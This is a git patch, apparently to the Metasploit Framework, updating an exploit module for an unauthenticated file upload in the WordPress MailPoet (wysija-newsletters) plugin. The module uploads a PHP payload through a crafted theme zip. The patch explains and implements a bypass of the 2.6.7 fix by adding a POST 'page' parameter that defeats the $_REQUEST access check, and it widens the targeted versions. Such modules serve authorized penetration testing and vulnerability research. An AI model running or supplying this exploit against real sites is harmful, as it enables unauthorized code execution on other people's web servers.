From d5843f8eaf864871d95ce6dd18f56500b2158d9d Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 6 Jul 2014 10:53:40 +0200 Subject: [PATCH] Updated Mailpoet exploit to work with another version --- .../webapp/wp_wysija_newsletters_upload.rb | 18 +++++++++++++----- 1 file changed, 13 insertions(+), 5 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index d68c732195..76a6f39bff 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -15,11 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload', 'Description' => %q{ - The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7 + The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8 is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme functionality to upload a zip file containing the payload. The plugin used the admin_init hook, which is also executed for unauthenticated users when accessing - a specific URL. + a specific URL. The developers tried to fix the vulnerablility + in version 2.6.7 but the fix can be bypassed. In PHPs default configuration, + a POST variable overwrites a GET variable in the $_REQUEST array. The plugin + uses $_REQUEST to check for access rights. By setting the POST parameter to + something not beginning with 'wysija_', the check is bypassed. Wordpress uses + the $_GET array to determine the page and is so not affected by this. }, 'Author' => [ @@ -29,12 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ] + [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ], + [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'], + [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php'] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, - 'Targets' => [ ['wysija-newsletters < 2.6.7', {}] ], + 'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 1 2014')) end @@ -81,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Found version #{version} of the plugin") - if Gem::Version.new(version) < Gem::Version.new('2.6.7') + if Gem::Version.new(version) < Gem::Version.new('2.6.8') return Msf::Exploit::CheckCode::Appears else return Msf::Exploit::CheckCode::Safe @@ -101,6 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"') data.add_part('themeupload', nil, nil, 'form-data; name="action"') data.add_part('Upload', nil, nil, 'form-data; name="submitter"') + data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"') post_data = data.to_s payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)